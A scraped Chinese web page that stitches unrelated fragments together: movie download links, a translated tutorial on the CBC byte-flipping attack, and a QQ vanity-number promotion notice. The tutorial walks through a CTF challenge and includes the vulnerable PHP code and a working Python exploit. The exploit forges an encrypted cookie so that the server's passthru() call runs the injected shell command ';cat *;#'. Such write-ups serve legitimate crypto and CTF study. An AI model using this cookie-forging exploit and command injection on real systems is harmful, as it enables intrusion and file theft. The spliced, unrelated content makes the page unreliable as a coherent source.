thunder://QUFlZDJrOi8vfGZpbGV8UyVFNyVBMCVCNCVFNyU4QiVCQzIuSEQxMjgwJUU5JUFCJTk4JUU2JUI4JTg1JUU1JTlCJUJEJUU4JUFGJUFEJUU0JUI4JUFEJUU1JUFEJTk3Lm1wNHwxNDMxMDIyNjAwfDJGNzdCODlBN0Y4NUE0OUI1NDEzNDJGNjY4OUUyRUJFfGg9UU03NVJDQjZONkY1WkJGN0RUTEkyTFlKN0JSS1M1MjZ8L1pa

HD1280超清国语中字.mp4

thunder://QUFlZDJrOi8vfGZpbGV8UyVFNyVBMCVCNCVFNyU4QiVCQzIuSEQxMjgwJUU4JUI2JTg1JUU2JUI4JTg1JUU1JTlCJUJEJUU4JUFGJUFEJUU0JUI4JUFEJUU1JUFEJTk3Lm1wNHwyMzA2Njg3MDQ1fDc1RkUzRTlFODgyMzdGMTE3RkIyODUyQTRDMzJFN0Q1fGg9SlJIU0xHUTdXR09NVkxHS0NMT1NVWE5TUzdRU1k1SlF8L1pa

 

0x00 译者前言

本文翻译自:http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/

drops里的相关主题文章:使用CBC比特反转攻击绕过加密的会话令牌
缘起是糖果出的一道题,看到原文作者对这一问题阐述的较为详细,虽然时间有些久远,但翻译一下可与诸君学习一下思考问题的方法。

0x01 相关介绍

此攻击方法的精髓在于:通过损坏密文字节来改变明文字节。(注:借助CBC内部的模式)借由此可以绕过过滤器,或者改变用户权限提升至管理员,又或者改变应用程序预期明文以尽猥琐之事。

首先让我们看看CBC是如何工作的,(作者很懒所以)更多细节你可以看这里:wiki
在这里只是解释一下关于攻击必须要理解的部分。(即:一图胜千言)

加密过程

Plaintext:待加密的数据。

IV:用于随机化加密的比特块,保证即使对相同明文多次加密,也可以得到不同的密文。

Key:被一些如AES的对称加密算法使用。

Ciphertext:加密后的数据。

在这里重要的一点是,CBC工作于一个固定长度的比特组,将其称之为块。在本文中,我们将使用包含16字节的块。

因为作者讨厌高数(和译者一样),所以作者造了一些自己的公式(方便记忆):
•Ciphertext-0 = Encrypt(Plaintext XOR IV)—只用于第一个组块
•Ciphertext-N= Encrypt(Plaintext XOR Ciphertext-N-1)—用于第二及剩下的组块

注意:正如你所见,前一块的密文用来产生后一块的密文。

Decryption Process

•Plaintext-0 = Decrypt(Ciphertext) XOR IV—只用于第一个组块
•Plaintext-N= Decrypt(Ciphertext) XOR Ciphertext-N-1—用于第二及剩下的组块

注意:Ciphertext-N-1(密文-N-1)是用来产生下一块明文;这就是字节翻转攻击开始发挥作用的地方。如果我们改变Ciphertext-N-1(密文-N-1)的一个字节,然后与下一个解密后的组块异或,我们就可以得到一个不同的明文了!You got it?别担心,下面我们将看到一个详细的例子。与此同时,下面的这张图也可以很好地说明这种攻击:

0x02 一个例子(CBC Blocks of 16 bytes)

比方说,我们有这样的明文序列:

a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo 'Hello sdsdsd!'";}

我们的目标是将“s:6”当中的数字6转换成数字“7”。我们需要做的第一件事就是把明文分成16个字节的块:
•Block 1:a:2:{s:4:"name"; •Block 2:s:6:"sdsdsd";s:8 •Block 3::"greeting";s:20 •Block 4::"echo 'Hello sd •Block 5:sdsd!'";} 因此,我们的目标字符位于块2,这意味着我们需要改变块1的密文来改变第二块的明文。

有一条经验法则是(注:结合上面的说明图可以得到),你在密文中改变的字节,只会影响到在下一明文当中,具有相同偏移量的字节。所以我们目标的偏移量是2:
•[0] = s
•1 = :
•2 =6

因此我们要改变在第一个密文块当中,偏移量是2的字节。正如你在下面的代码当中看到的,在第2行我们得到了整个数据的密文,然后在第3行中,我们改变块1中偏移量为2的字节,最后我们再调用解密函数。
1.$v = "a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo 'Hello sdsdsd!'";}";
2.$enc = @encrypt($v);
3.$enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord ("7"));
4.$b = @decrypt($enc);

运行这段代码后,我们可以将数字6变为7:

但是我们在第3行中,是如何改变字节成为我们想要的值呢?

基于上述的解密过程,我们知道有,A = Decrypt(Ciphertext)与B = Ciphertext-N-1异或后最终得到C = 6。等价于:
A = B XOR C
最后,A XOR B XOR C等于0。有了这个公式,我们可以在XOR运算的末尾处设置我们自己的值,就像这样:

A XOR B XOR C XOR "7"会在块2的明文当中,偏移量为2的字节处得到7。

下面是相关原理实现的PHP源代码:

define('MY_AES_KEY', "abcdef0123456789"); function aes($data, $encrypt) { $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, ''); $iv = "1234567891234567"; mcrypt_generic_init($aes, MY_AES_KEY, $iv); return $encrypt ? mcrypt_generic($aes,$data) : mdecrypt_generic($aes,$data); } define('MY_MAC_LEN', 40); function encrypt($data) { return aes($data, true); } function decrypt($data) { $data = rtrim(aes($data, false), "\0"); return $data; } $v = "a:2:{s:4:\"name\";s:6:\"sdsdsd\";s:8:\"greeting\";s:20:\"echo 'Hello sdsdsd!'\";}"; echo "Plaintext before attack: $v\n"; $b = array(); $enc = array(); $enc = @encrypt($v); $enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord ("7")); $b = @decrypt($enc); echo "Plaintext AFTER attack : $b\n";
0x03 一个练习

光说不练假把式,接下来作者举了一个他参加过的CTF中的一道题目的例子(更多详情可以参阅最后的相关参考链接),然后阐述了他是怎样在最后几步中打破CBC的。

下面提供了这个练习当中很重要的一部分源码:

name = 'X' + ';cat *;#a'

首先作者添加了一个字符"X",通过CBC翻转攻击将其替换成一个单引号,然后;cat *;命令将被执行,最后的#是用来注释,确保函数escapeshellarg()插入的单引号不会引起其他问题;因此我们的命令就被成功执行啦。

在计算好之前的密码块中,要被改变的字节的确切偏移量(51)后,作者通过下面的代码来注入单引号:

pos = 51; val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos])) exploit = cookie[0:pos] + val + cookie[pos + 1:]

然后作者通过改变cookie(因为其具有全部的密文),得到以下结果:

首先,因为我们改变了第一块,所以在第二块中,黄色标记的"X"被成功替换为单引号,它被认为是多余插入(绿色),导致在unserialize()处理数据时产生一个错误(红色),因此应用程序甚至都没有去尝试执行注入了。

如何完善

我们需要使我们的注入数据有效,那么我们在第一块中得到的额外数据,就不能在反序列化的过程中造成任何问题(unserialize())。一种方法是在我们的恶意命令中填充字母字符。因此我们尝试在注入字符串前后填充多个'z':

name = 'z'*17 + 'X' + ';cat *;#' + 'z'*16

在发送上述字符串后,unserialize()并没有报错,并且我们的shell命令成功执行!!!

0x04 相关参考

1.CRYPTO #2: http://blog.gdssecurity.com/labs/tag/crypto
2.http://codezen.fr/2013/08/05/ebctf-2013-web400-cryptoaescbchmac-write-up/
3.http://hardc0de.ru/2013/08/04/ebctf-web400/

0x05 附录代码

下面是上面练习当中的PHP源码及exp:

•PHP code:
ini_set('display_errors',1); error_reporting(E_ALL); define('MY_AES_KEY', "abcdef0123456789"); define('MY_HMAC_KEY',"1234567890123456" ); #define("FLAG","CENSORED"); function aes($data, $encrypt) { $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, ''); $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($aes), MCRYPT_RAND); $iv = "1234567891234567"; mcrypt_generic_init($aes, MY_AES_KEY, $iv); return $encrypt ? mcrypt_generic($aes, $data) : mdecrypt_generic($aes, $data); } define('MY_MAC_LEN', 40); function hmac($data) { return hash_hmac('sha1', data, MY_HMAC_KEY); } function encrypt($data) { return aes($data . hmac($data), true); } function decrypt($data) { $data = rtrim(aes($data, false), "\0"); $mac = substr($data, -MY_MAC_LEN); $data = substr($data, 0, -MY_MAC_LEN); return hmac($data) === $mac ? $data : null; } $settings = array(); if (@$_COOKIE['settings']) { echo @decrypt(base64_decode($_COOKIE['settings'])); $settings = unserialize(@decrypt(base64_decode($_COOKIE['settings']))); } if (@$_POST['name'] && is_string($_POST['name']) && strlen($_POST['name']) < 200) { $settings = array( 'name' => $_POST['name'], 'greeting' => ('echo ' . escapeshellarg("Hello {$_POST['name']}!")), ); setcookie('settings', base64_encode(@encrypt(serialize($settings)))); #setcookie('settings', serialize($settings)); } $d = array(); if (@$settings['greeting']) { passthru($settings['greeting']); else { echo "

\n";
echo "
What is your name?

\n";
echo "\n";
echo "\n";
echo "

\n";
}
?>
 
Exploit:
#!/usr/bin/python import requests import sys import urllib from base64 import b64decode as dec from base64 import b64encode as enc url = 'http://192.168.184.133/ebctf/mine.php' def Test(x): t = "echo 'Hello %s!'" % x s = 'a:2:{s:4:"name";s:%s:"%s";s:8:"greeting";s:%s:"%s";}%s' % (len(x),x,len(t),t, 'X'*40) for i in xrange(0,len(s),16): print s[i:i+16] print '\n' def Pwn(s): global url s = urllib.quote_plus(enc(s)) req = requests.get(url, cookies = {'settings' : s}).content # if req.find('works') != -1: print req # else: # print '[-] FAIL' def GetCookie(name): global url d = { 'name':name, 'submit':'Submit' } h = requests.post(url, data = d, headers = {'Content-Type' : 'application/x-www-form-urlencoded'}).headers if h.has_key('set-cookie'): h = dec(urllib.unquote_plus(h['set-cookie'][9:])) #h = urllib.unquote_plus(h['set-cookie'][9:]) #print h return h else: print '[-] ERROR' sys.exit(0) #a:2:{s:4:"name";s:10:"X;cat *;#a";s:8:"greeting";s:24:"echo 'Hello X;cat *;#a!'";} #a:2:{s:4:"name"; #s:10:"X;cat *;#a #";s:8:"greeting" #;s:24:"echo 'Hel #lo X;cat *;#a!'" #;} #a:2:{s:4:"name";s:42:"zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz";s:8:"greeting";s:56:"echo 'Hello zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz!'";} #a:2:{s:4:"name"; #s:42:"zzzzzzzzzz #zzzzzzzX;cat *;# #zzzzzzzzzzzzzzzz #";s:8:"greeting" #;s:56:"echo 'Hel #lo zzzzzzzzzzzzz #zzzzX;cat *;#zzz #zzzzzzzzzzzzz!'" #;} #exploit = 'X' + ';cat *;#a' #Test case first, unsuccess exploit = 'z'*17 + 'X' + ';cat *;#' + 'z' *16 # Test Success #exploit = "______________________________________________________; cat *;#" #Test(exploit) cookie = GetCookie(exploit) pos = 100; #test case success #pos = 51; #test case first, unsuccess val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos])) exploit = cookie[0:pos] + val + cookie[pos + 1:] Pwn(exploit)

这个活动是腾讯目前付费把免费QQ号码转为靓号的活动,点亮QQ上的靓字。

当然了 仅限 5~8位QQ参与,不排除以后推出9~10位QQ号码参与的可能性。毕竟赚钱在节操面前是不值一提的。
有钱的土豪放心转,目前规则看 号码不会永久转为靓号,仅点亮靓字,到期后自动变普通QQ。

活动地址:http://www.iqshw.com/qqnews/2015/0708/97860.html

- 阅读剩余部分 -